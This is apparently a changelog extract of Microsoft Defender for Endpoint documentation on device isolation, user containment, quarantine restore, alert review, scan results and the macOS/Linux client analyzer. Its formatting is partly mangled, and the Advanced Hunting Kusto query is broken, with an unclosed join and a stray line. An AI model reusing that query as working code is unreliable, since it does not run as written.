-Depending on the severity of the attack and the sensitivity of the device, you might want to isolate the device from the network. This action can help prevent the attacker from controlling the compromised device and performing further activities such as data exfiltration and lateral movement.
-
-> [!IMPORTANT]
->
-> - Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see [Investigate entities on devices using live response](live-response.md)
-> - Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016 and Windows Server 2012 R2.
-> - You can use the device isolation capability on all supported Microsoft Defender for Endpoint on Linux listed in [System requirements](microsoft-defender-endpoint-linux.md#system-requirements). Ensure that the following prerequisites are enabled: iptables, ip6tables, and Linux kernel with CONFIG_NETFILTER, CONFID_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
-> - Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
-> - When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
-> - The feature supports VPN connection.
-> - You must have at least one the following role permissions: 'Active remediation actions'. For more information, see [Create and manage roles](user-roles.md).
-> - You must have access to the device based on the device group settings. For more information, see [Create and manage device groups](machine-groups.md).
-> - Exclusion for both macOS and Linux isolation is not supported.
-> - An isolated device is removed from isolation when an administrator modifies or adds a new iptable rule to the isolated device.
-> - Isolating a server running on Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.
-
-This device isolation feature disconnects the compromised device from the network while retaining connectivity to the Defender for Endpoint service, which continues to monitor the device.
-
-On Windows 10, version 1709 or later, you'll have more control over the network isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for Business connectivity (a.k.a 'Selective Isolation').
-
-> [!NOTE]
-> You'll be able to reconnect the device back to the network at any time. The button on the device page will change to say **Release from isolation**, and then you take the same steps as isolating the device.
-
-Once you have selected **Isolate device** on the device page, type a comment and select **Confirm**. The Action center will show the scan information and the device timeline will include a new event.
--
-> [!NOTE]
-> The device will remain connected to the Defender for Endpoint service even if it is isolated from the network. If you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the user while the device is isolated. Selective isolation only works on the classic versions of Outlook and Microsoft Teams.
-
-### Forcibly release device from isolation
-
-The device isolation feature is an invaluable tool for safeguarding devices against external threats. However, there are instances when isolated devices become unresponsive.<br>
-There's a downloadable script for these instances that you can run to forcibly release devices from isolation. The script is available through a link in the UI.
-
-> [!NOTE]
-> - Admins and manage security settings in Security Center permissions can forcibly release devices from isolation.
-> - The script is valid for the specific device only.
-> - The script will expire in three days.
-
-To forcibly release device from isolation:
-
-1. On the device page, select **Download script to force-release a device from isolation** from the action menu.
-1. On the right-hand side wizard, select **Download script**.
-
-#### Minimum requirements
-The minimum requirements for 'forcibly release device from isolation' feature are:
--- Supports only Windows-- The following Windows versions are supported:
- - Windows 10 21H2 and 22H2 with KB KB5023773
- - Windows 11 version 21H2, all editions with KB5023774
- - Windows 11 version 22H2, all editions with KB5023778
-
-
-### Notification on device user
-
-When a device is being isolated, the following notification is displayed to inform the user that the device is being isolated from the network:
--
-> [!NOTE]
-> The notification is not available on non-Windows platforms.
-
-## Contain devices from the network
-
-When you have identified an unmanaged device that is compromised or potentially compromised, you might want to contain that device from the network. When you contain a device any Microsoft Defender for Endpoint onboarded device will block incoming and outgoing communication with that device. This action can help prevent neighboring devices from becoming compromised while the security operations analyst locates, identifies, and remediates the threat on the compromised device.
-
-> [!NOTE]
-> Blocking incoming and outgoing communication with a 'contained' device is supported on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+ devices.
-
-### How to contain a device
-
-1. Go to the **Device inventory** page and select the device to contain.
-
-2. Select **Contain device** from the actions menu in the device flyout.
-
- :::image type="content" alt-text="Screenshot of the contain device popup message." source="../../media/defender-endpoint/contain_device.png" lightbox="../../media/defender-endpoint/contain_device.png":::
-
-3. On the contain device popup, type a comment, and select **Confirm**.
--
-### Contain a device from the device page
-
-A device can also be contained from the device page by selecting **Contain device** from the action bar:
--
-> [!NOTE]
-> It can take up to 5 minutes for the details about a newly contained device to reach Microsoft Defender for Endpoint onboarded devices.
-
-> [!IMPORTANT]
->
-> - If a contained device changes its IP address, then all Microsoft Defender for Endpoint onboarded devices will recognize this and start blocking communications with the new IP address. The original IP address will no longer be blocked (It may take up to 5 mins to see these changes).
-> - In cases where the contained device's IP is used by another device on the network, there will be a warning while containing the device, with a link to advanced hunting (with a pre-populated query). This will provide visibility to the other devices using the same IP to help you make a conscious decision if you'd like to continue with containing the device.
-> - In cases where the contained device is a network device, a warning will appear with a message that this may cause network connectivity issues (for example, containing a router that is acting as a default gateway). At this point, you'll be able to choose whether to contain the device or not.
-
-After you contain a device, if the behavior isn't as expected, verify the Base Filtering Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.
-
-### Stop containing a device
-
-You'll be able to stop containing a device at any time.
-
-1. Select the device from the **Device inventory** or open the device page.
-
-2. Select **Release from containment** from the action menu. This action will restore this device's connection to the network.
-
-## Contain user from the network
-
-When an identity in your network might be compromised, you must prevent that identity from accessing the network and different endpoints. Defender for Endpoint can "contain" an identity, blocking it from access, and helping prevent attacks-- specifically, ransomware. When an identity is contained, any supported Microsoft Defender for Endpoint onboarded device will block incoming traffic in specific protocols related to attacks (network logons, RPC, SMB, RDP), terminate ongoing remote sessions and logoff existing RDP connections (termination the session itself including all its related processes), while enabling legitimate traffic. This action can significantly help to reduce the impact of an attack. When an identity is contained, security operations analysts have extra time to locate, identify and remediate the threat to the compromised identity.
-
-> [!NOTE]
-> Blocking incoming communication with a "contained" user is supported on onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and higher), Windows Server 2019+ devices, and Windows Servers 2012R2 and 2016 with the modern agent.
-
-### How to contain a user
-
-Currently, containing users is only available automatically by using automatic attack disruption. When Microsoft detects a user as being compromised a "Contain User" policy is automatically set.
-
-### View the contain user actions
-
-After a user is contained, you can view the action in this History view of the Action Center. Here, you can see when the action occurred, and which users in your organization were contained:
--
-Furthermore, after an identity is considered "contained", that user will be blocked by Defender for Endpoint and cannot perform any malicious lateral movement or remote encryption on or to any supported Defender for Endpoint onboarded device. These blocks will show up as alerts to help you quickly see the devices the compromised user attempted access and potential attack techniques:
--
-### Undo contain user actions
-
-You can release the blocks and containment on a user at any time:
-
-1. Select the **Contain User** action in the **Action Center**. In the side pane select **Undo**
-2. Select the user from either the user inventory, Incident page side pane or alert side pane and select **Undo**
-
-This action will restore this user's connection to the network.
--
-### Investigation capabilities with Contain User
-
-After a user is contained, you can investigate the potential threat by viewing the blocked actions by the compromised user. In the Device timeline view, you can see information about specific events, including protocol and interface granularity, and the relevant MITRE Technique associated it.
--
-In addition, you can expand the investigation by using Advanced Hunting. Look for any "Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all the different singular blocking events in relation to Contain User in your tenant, dive deeper into the context of each block, and extract the different entities and techniques associated with those events.
--
-## Consult a threat expert
-
-You can consult a Microsoft threat expert for more insights regarding a potentially compromised device or already compromised ones. Microsoft Threat Experts can be engaged directly from within the Microsoft Defender XDR for timely and accurate response. Experts provide insights not just regarding a potentially compromised device, but also to better understand complex threats, targeted attack notifications that you get, or if you need more information about the alerts, or a threat intelligence context that you see on your portal dashboard.
-
-See [Consult a Microsoft Threat Expert](/microsoft-365/security/defender-endpoint/configure-microsoft-threat-experts#consult-a-microsoft-threat-expert-about-suspicious-cybersecurity-activities-in-your-organization) for details.
-
-## Check activity details in Action center
-
-The **Action center** provides information on actions that were taken on a device or file. You'll be able to view the following details:
--- Investigation package collection-- Antivirus scan-- App restriction-- Device isolation-
-All other related details are also shown, for example, submission date/time, submitting user, and if the action succeeded or failed.
--
-## See also
--- [Take response actions on a file](respond-file-alerts.md)-- [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions)-- [Report inaccuracy](/microsoft-365/security/defender-endpoint/tvm-security-recommendation#report-inaccuracy)-
security Restore Quarantined Files Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/restore-quarantined-files-microsoft-defender-antivirus.md
- Title: Restore quarantined files in Microsoft Defender Antivirus
-description: You can restore quarantined files and folders in Microsoft Defender Antivirus.
---- Previously updated : 08/28/2023------- m365-security-- tier2-- mde-ngp--
-# Restore quarantined files in Microsoft Defender Antivirus
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Depending on how Microsoft Defender Antivirus is configured, it quarantines suspicious files. If you're certain a quarantined file isn't a threat, you can restore it on your Windows device.
-
-1. On your Windows device, open **Windows Security**.
-
-2. Select **Virus & threat protection** and then, under **Current threats**, select **Protection history**.
-
-3. If you have a list of items, you can filter on **Quarantined Items**.
-
-4. Select an item you want to keep, and choose an action, such as **Restore**.
-
-> [!TIP]
-> You can also restore a file from quarantine by using Command Prompt. See [Restore file from quarantine](respond-file-alerts.md#restore-file-from-quarantine).
--
-## See also
--- [Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md)-- [Review scan results](review-scan-results-microsoft-defender-antivirus.md)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
--
security Review Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-alerts.md
- Title: Review alerts in Microsoft Defender for Endpoint
-description: Review alert information, including a visualized alert story and details for each step of the chain.
-
- - NOCSH
----
- - m365-security
- - tier1
- - mde-edr
- Previously updated : 5/1/2020---
-# Review alerts in Microsoft Defender for Endpoint
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-managealerts-abovefoldlink)
-
-The alert page in Microsoft Defender for Endpoint provides full context to the alert, by combining attack signals and alerts related to the selected alert, to construct a detailed alert story.
-
-Quickly triage, investigate, and take effective action on alerts that affect your organization. Understand why they were triggered, and their impact from one location. Learn more in this overview.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4yiO5]
-
-## Getting started with an alert
-
-Selecting an alert's name in Defender for Endpoint will land you on its alert page. On the alert page, all the information will be shown in context of the selected alert. Each alert page consists of 4 sections:
-
-1. **The alert title** shows the alert's name and is there to remind you which alert started your current investigation regardless of what you have selected on the page.
-2. [**Affected assets**](#review-affected-assets) lists cards of devices and users affected by this alert that are clickable for further information and actions.
-3. The **alert story** displays all entities related to the alert, interconnected by a tree view. The alert in the title will be the one in focus when you first land on your selected alert's page. Entities in the alert story are expandable and clickable, to provide additional information and expedite response by allowing you to take actions right in the context of the alert page. Use the alert story to start your investigation. Learn how in [Investigate alerts in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/investigate-alerts).
-4. The **details pane** will show the details of the selected alert at first, with details and actions related to this alert. If you select any of the affected assets or entities in the alert story, the details pane will change to provide contextual information and actions for the selected object.
-
-Note the detection status for your alert.
--- Prevented: The attempted suspicious action was avoided. For example, a file either wasn't written to disk or executed.-
- :::image type="content" source="media/detstat-prevented.png" alt-text="The page showing the prevention of a threat" lightbox="media/detstat-prevented.png":::
--- Blocked: Suspicious behavior was executed and then blocked. For example, a process was executed but because it subsequently exhibited suspicious behaviors, the process was terminated.-
- :::image type="content" source="media/detstat-blocked.png" alt-text="The page showing the blockage of a threat" lightbox="media/detstat-blocked.png":::
--- Detected: An attack was detected and is possibly still active.-
- :::image type="content" source="media/detstat-detected.png" alt-text="The page showing the detection of a threat" lightbox="media/detstat-detected.png":::
-
-You can then also review the *automated investigation details* in your alert's details pane, to see which actions were already taken, as well as reading the alert's description for recommended actions.
--
-Other information available in the details pane when the alert opens includes MITRE techniques, source, and additional contextual details.
-
-> [!NOTE]
-> If you see an *Unsupported alert type* alert status, it means that automated investigation capabilities cannot pick up that alert to run an automated investigation. However, you can [investigate these alerts manually](../defender/investigate-incidents.md#alerts).
-
-## Review affected assets
-
-Selecting a device or a user card in the affected assets sections will switch to the details of the device or user in the details pane.
--- **For devices**, the details pane will display information about the device itself, like Domain, Operating System, and IP. Active alerts and the logged on users on that device are also available. You can take immediate action by isolating the device, restricting app execution, or running an antivirus scan. Alternatively, you could collect an investigation package, initiate an automated investigation, or go to the device page to investigate from the device's point of view.-
- :::image type="content" source="media/device-page-details.png" alt-text="The details pane when a device is selected" lightbox="media/device-page-details.png":::
--- **For users**, the details pane will display detailed user information, such as the user's SAM name and SID, as well as logon types performed by this user and any alerts and incidents related to it. You can select *Open user page* to continue the investigation from that user's point of view.-
- :::image type="content" source="media/user-page-details.png" alt-text="The details pane when a user is selected" lightbox="media/user-page-details.png":::
-
-## Related topics
--- [View and organize the incidents queue](view-incidents-queue.md)-- [Investigate incidents](investigate-incidents.md)-- [Manage incidents](manage-incidents.md)
security Review Detected Threats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-detected-threats.md
- Title: Review detected threats using the Microsoft Defender for Endpoint Antivirus and Intune integration
-description: Use the Microsoft Defender for Endpoint Antivirus and Intune integration to view and manage threat detections.
------- m365-security-- tier2-- mde-edr- Previously updated : 02/02/2024---
-# Microsoft Defender for Endpoint Antivirus and Intune integration
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatealerts-abovefoldlink)
-
-**Platforms**
--- Windows-- macOS-- Android-
-In the Microsoft Defender portal, you can view and manage threat detections using the following steps:
-
-1. Visit [Microsoft XDR portal](https://security.microsoft.com/) and sign-in.
-
- On the landing page, you'll see the **Devices with active malware** card with the following information:
-
- - Display text: Applies to Intune-managed devices. Devices with multiple malware detections may be counted more than once.
- - Last updated date and time.
- - A bar with the Active and Malware remediated portions as per your scan.
-
- You can select **View Details** for more information.
-
-2. Once remediated, you'll see the following text being displayed:
-
- *Malware found on your devices have been remediated successfully*.
-
-## Manage threat detections in Microsoft Intune
-
-You can manage threat detections for any devices that are [enrolled in Microsoft Intune](/mem/intune/enrollment/windows-enrollment-methods) using the following steps:
-
-1. Go to the Microsoft Intune admin center at [intune.microsoft.com](https://intune.microsoft.com) and sign-in.
-
-2. In the navigation pane, select **Endpoint security**.
-
-3. Under **Manage**, select **Antivirus**. You'll see tabs for **Summary**, **Unhealthy endpoints**, and **Active malware**.
-
-4. Review the information on the available tabs, and then take action as necessary.
-
- For example, when you can select a device that is listed under the **Active malware** tab, you can choose one action from the list of actions provided:
- - Restart
- - Quick Scan
- - Full Scan
- - Sync
- - Update signatures
-
-## FAQs
-
-### In the Microsoft XDR portal > Devices with active malware > Devices with malware detections report, why does the Last update seem to be occurring today?
-
-To see when the malware was detected, you can do the following:
-
-1. Since this is an integration with Intune, visit [**Intune portal**](https://intune.microsoft.com) and select **Antivirus** and then select **Active malware** tab.
-2. Select **Export**.
-3. On your device, go to Downloads, and extract the Active malware_YYYY_MM_DD_THH_MM_SS.0123Z.csv.zip.
-4. Open the CSV and find the **LastStateChangeDateTime** column to see when malware was detected.
-
-### In the devices with malware detections report, why canΓÇÖt I see any information about which malware was detected on the device.
-
-To see the malware name, visit the [Intune portal](https://intune.microsoft.com) as this is an integration with Intune, select **Antivirus**, and select **Active malware** tab and you'll see a column named **Malware name**.
-
-### I see a different number for active malware in Devices with active malware report, when compared to numbers I see using Reports > Detected malware, and Intune > Antivirus > Active malware.
-
-The **Devices with active malware** report is based on the devices that were active within the last 1 day (24 hours) and had malware detections within the last 15 days.
-
-Use the following Advanced Hunting query:
-
-```kusto
-DeviceInfo
-| where Timestamp > startofday(datetime(2024-01-29 00:00:00))
-| where OnboardingStatus == "Onboarded"
-| where SensorHealthState == "Active"
-| distinct DeviceId, DeviceName
-| join kind=innerunique (
-AlertEvidence
-| where Timestamp > ago(15d)
-| where ServiceSource == "Microsoft Defender for Endpoint"
-| where DetectionSource == "Antivirus"
-DeviceName
-| distinct DeviceName, DeviceId, Title, AlertId, Timestamp
-```
-
-### I searched the computer name in the top search bar and got two devices with the same name. I don't know which one of those two devices the report is referring to?
-
-Use the Advanced Hunting query that is mentioned [here](#i-see-a-different-number-for-active-malware-in-devices-with-active-malware-report-when-compared-to-numbers-i-see-using-reports--detected-malware-and-intune--antivirus--active-malware) for details such as unique DeviceID, Title, AlertID, and the remediation process. After identifying, work with your IT adminΓÇÖs to make sure that the devices are uniquely named. If a device is retired, use [tags to decommission it.](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-1/ba-p/1964058)
-
-### I see malware detection in Intune and on the Devices with active malware report, but I donΓÇÖt see it in the MDE Alerts queue or in the Incidents queue.
-
-It might be that the URL's [Cloud Protection](configure-network-connections-microsoft-defender-antivirus.md) is currently not being allowed through your firewall or proxy.
-
-You need to ensure that when you run `%ProgramFiles%\Windows Defender\MpCmdRun.exe -ValidateMapsConnection` on your device, the reporting is Ok.
-
-## Related articles
--- [Alerts in Microsoft Defender for Endpoint](investigate-alerts.md)-- [Alerts queue in Microsoft Defender XDR](alerts-queue-endpoint-detection-response.md)
security Review Scan Results Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-scan-results-microsoft-defender-antivirus.md
- Title: Review the results of Microsoft Defender Antivirus scans
-description: Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
---- Previously updated : 12/11/2023------- m365-security-- tier2-- mde-ngp--
-# Review Microsoft Defender Antivirus scan results
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/en-us/microsoft-365/microsoft-defender-for-individuals)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-
-**Platforms**
--- Windows-
-After a Microsoft Defender Antivirus scan completes, whether it's an [on-demand](run-scan-microsoft-defender-antivirus.md) or [scheduled scan](scheduled-catch-up-scans-microsoft-defender-antivirus.md), the results are recorded and you can view the results.
-
-## Use Microsoft Defender XDR to review scan results
-
-To view the scan results using Microsoft Defender XDR Endpoint, follow the below process.
-
-1. Sign in to [Microsoft Defender portal](https://security.microsoft.com)
-
-2. Go to **Incidents & alerts** \> **Alerts**.
-
- You can view the scanned results under **Alerts**.
-
-## Use Microsoft Intune to review scan results
-
-To view the scan results using Microsoft Intune admin center, follow the below process.
-
-1. Sign in to [Microsoft Intune admin center](https://intune.microsoft.com/#home).
-1. Go to **Reports**.
-1. Under **Endpoint security**, select **Microsoft Defender Antivirus**.
-1. In the **Reports** tab, select **Detected malware**.
-1. Select the **Severity** level from the dropdown list.
-
- By default **All severity** option is selected.
-1. Select **Execution state** from the dropdown list.
-
- By default **All execution state** option is selected.
-1. Select **Managed by** from the dropdown list.
-
- By default **All Managed by** option is selected.
-1. Click on **Generate report**.
-
-## Use Configuration Manager to review scan results
-
-See [How to monitor Endpoint Protection status](/configmgr/protect/deploy-use/monitor-endpoint-protection).
-
-## Use PowerShell cmdlets to review scan results
-
-The following cmdlet returns each detection on the endpoint. If there are multiple detections of the same threat, each detection is listed separately, based on the time of each detection:
-
-```PowerShell
-Get-MpThreatDetection
-```
--
-You can specify `-ThreatID` to limit the output to only show the detections for a specific threat.
-
-If you want to list threat detections, but combine detections of the same threat into a single item, you can use the following cmdlet:
-
-```PowerShell
-Get-MpThreat
-```
--
-See [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-## Use Windows Management Instruction (WMI) to review scan results
-
-Use the [**Get** method of the **MSFT_MpThreat** and **MSFT_MpThreatDetection**](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal) classes.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Run Analyzer Macos Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-macos-linux.md
- Title: Run the client analyzer on macOS or Linux
-description: Learn how to run the Microsoft Defender for Endpoint Client Analyzer on macOS or Linux
--- NOCSH-- Previously updated : 04/16/2024---- m365-security-- tier2-- mde-ngp----
-# Run the client analyzer on macOS and Linux
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-The XMDEClientAnalyzer is used for diagnosing Microsoft Defender for Endpoint health or reliability issues on onboarded devices running either Linux, or macOS.
-
-There are two ways to run the client analyzer tool:
-
-1. Using a binary version (no Python dependency)
-2. Using a Python-based solution
--
-## Running the binary version of the client analyzer
-
-1. Download the [XMDE Client Analyzer Binary](https://aka.ms/XMDEClientAnalyzerBinary) tool to the macOS or Linux machine you need to investigate.\
-If you're using a terminal, download the tool by entering the following command:
-
- ```console
- wget --quiet -O XMDEClientAnalyzerBinary.zip https://aka.ms/XMDEClientAnalyzerBinary
- ```
-
-2. Verify the download.
-
- > [!NOTE]
- > The current SHA256 hash of 'XMDEClientAnalyzerBinary.zip' that is downloaded from this link is: '9D0552DBBD1693D2E2ED55F36147019CFECFDC009E76BAC4186CF03CD691B469'
-
- - Linux
-
- ```console
- echo '9D0552DBBD1693D2E2ED55F36147019CFECFDC009E76BAC4186CF03CD691B469 XMDEClientAnalyzerBinary.zip' | sha256sum -c
- ```
-
- - macOS
-
- ```console
- echo '9D0552DBBD1693D2E2ED55F36147019CFECFDC009E76BAC4186CF03CD691B469 XMDEClientAnalyzerBinary.zip' | shasum -a 256 -c
- ```
--
-3. Extract the contents of _XMDEClientAnalyzerBinary.zip_ on the machine.
-
- If you're using a terminal, extract the files by entering the following command:
-
- ```console
- unzip -q XMDEClientAnalyzerBinary.zip -d XMDEClientAnalyzerBinary
- ```
-
-4. Change to the tool's directory by entering the following command:
-
- ```console
- cd XMDEClientAnalyzerBinary
- ```
-
-5. Three new zip files are produced:
-
- - **SupportToolLinuxBinary.zip** : For all Linux devices
- - **SupportToolMacOSBinary.zip** : For Mac devices
-
-6. Unzip one of the above 2 zip files based on the machine you need to investigate.\
-When using a terminal, unzip the file by entering one of the following commands based on OS type:
-
- - Linux
-
- ```console
- unzip -q SupportToolLinuxBinary.zip
- ```
-
- - Mac
-
- ```console
- unzip -q SupportToolMacOSBinary.zip
- ```
-
-7. Run the tool as _root_ to generate diagnostic package:
-
- ```console
- sudo ./MDESupportTool -d
- ```
-
-## Running the Python-based client analyzer
-
-> [!NOTE]
->
-> - The analyzer depends on few extra PIP packages (sh, distro, lxml, pandas) which are installed in the OS when in root to produce the result output. If not installed, the analyzer will try to fetch it from the [official repository for Python packages](https://pypi.org/search/?q=lxml).
->
-> >[!WARNING]
-> >Running the Python-based client analyzer requires the installation of PIP packages which may cause some issues in your environment. To avoid issues from occurring, it is recommended that you install the packages into a user PIP environment.
->
-> - In addition, the tool currently requires Python version 3 or later to be installed.
->
-> - If your device is behind a proxy, then you can simply pass the proxy server as an environment variable to the mde_support_tool.sh script. For example:
-.
-> `https_proxy=https://myproxy.contoso.com:8080 ./mde_support_tool.sh"`
-
-1. Download the [XMDE Client Analyzer](https://aka.ms/XMDEClientAnalyzer) tool to the macOS or Linux machine you need to investigate.
-
- If you're using a terminal, download the tool by running the following command:
-
- ```console
- wget --quiet -O XMDEClientAnalyzer.zip https://aka.ms/XMDEClientAnalyzer
- ```
-
-2. Verify the download
-
- - Linux
-
- ```console
- echo '36C2B13AE657456119F3DC2A898FD9D354499A33F65015670CE2CD8A937F3C66 XMDEClientAnalyzer.zip' | sha256sum -c
- ```
-
- - macOS
-
- ```console
- echo '36C2B13AE657456119F3DC2A898FD9D354499A33F65015670CE2CD8A937F3C66 XMDEClientAnalyzer.zip' | shasum -a 256 -c
- ```
-
-3. Extract the contents of XMDEClientAnalyzer.zip on the machine.\
- If you're using a terminal, extract the files by using the following command:
-
- ```console
- unzip -q XMDEClientAnalyzer.zip -d XMDEClientAnalyzer
- ```
-
-4. Change directory to the extracted location.
-
- ```console
- cd XMDEClientAnalyzer
- ```
-
-5. Give the tool executable permission:
-
- ```console
- chmod a+x mde_support_tool.sh
- ```
-
-6. Run as a non-root user to install required dependencies:
-
- ```console
- ./mde_support_tool.sh
- ```
-
-7. To collect actual diagnostic package and generate the result archive file, run again as root:
-
- ```console
- sudo ./mde_support_tool.sh -d
- ```
-
-## Command line options
-
-### Primary command lines
-
-Use the following command to get the machine diagnostic.
-
-```console
--h, --help show this help message and exitoutput OUTPUT, -o OUTPUT
- Output path to export report
outdir OUTDIR Directory where diagnostics file will be generatedno-zip, -nz If set a directory will be created instead of an archive fileforce, -f Will overwrite if output directory existsdiagnostic, -d Collect extensive machine diagnostic informationbypass-disclaimer Do not display disclaimer bannermdatp-log {info,debug,verbose,error,trace,warning}
- Set MDATP log level
max-log-size MAX_LOG_SIZE
- Maximum log file size in MB before rotating(Will restart mdatp)
-```
-
-Usage example: `sudo ./MDESupportTool -d`
-
-### Positional arguments
-
-#### Collect performance info
-
-Collect extensive machine performance tracing for analysis of a performance scenario that can be reproduced on demand.
-
-```console
--h, --help show this help message and exitfrequency FREQUENCY
- profile at this frequency
length LENGTH length of time to collect (in seconds)
-```
-
-Usage example: `sudo ./MDESupportTool performance --frequency 2`
-
-#### Use OS trace (for macOS only)
-
-Use OS tracing facilities to record Defender for Endpoint performance traces.
-
-> [!NOTE]
-> This functionality exists in the Python solution only.
-
-```console
--h, --help show this help message and exitlength LENGTH Length of time to record the trace (in seconds).mask MASK Mask to select with event to trace. Defaults to all
-```
-
-On running this command for the first time, it installs a Profile configuration.
-
-Follow this to approve profile installation: [Apple Support Guide](https://support.apple.com/guide/mac-help/configuration-profiles-standardize-settings-mh35561/mac#:~:text=Install%20a%20configuration%20profile%20you%E2%80%99ve%20received).
-
-Usage example `./mde_support_tool.sh trace --length 5`
-
-#### Exclude mode
-
-Add exclusions for audit-d monitoring.
-
-> [!NOTE]
-> This functionality exists for Linux only.
-
-```console
- -h, --help show this help message and exit
- -e <executable>, --exe <executable>
- exclude by executable name, i.e: bash
- -p <process id>, --pid <process id>
- exclude by process id, i.e: 911
- -d <directory>, --dir <directory>
- exclude by target path, i.e: /var/foo/bar
- -x <executable> <directory>, --exe_dir <executable> <directory>
- exclude by executable path and target path, i.e: /bin/bash /var/foo/bar
- -q <q_size>, --queue <q_size>
- set dispatcher q_depth size
- -r, --remove remove exclusion file
- -s, --stat get statistics about common executables
- -l, --list list auditd rules
- -o, --override Override the existing auditd exclusion rules file for mdatp
- -c <syscall number>, --syscall <syscall number>
- exclude all process of the given syscall
-```
-
-Usage example: `sudo ./MDESupportTool exclude -d /var/foo/bar`
-
-### AuditD Rate Limiter
-
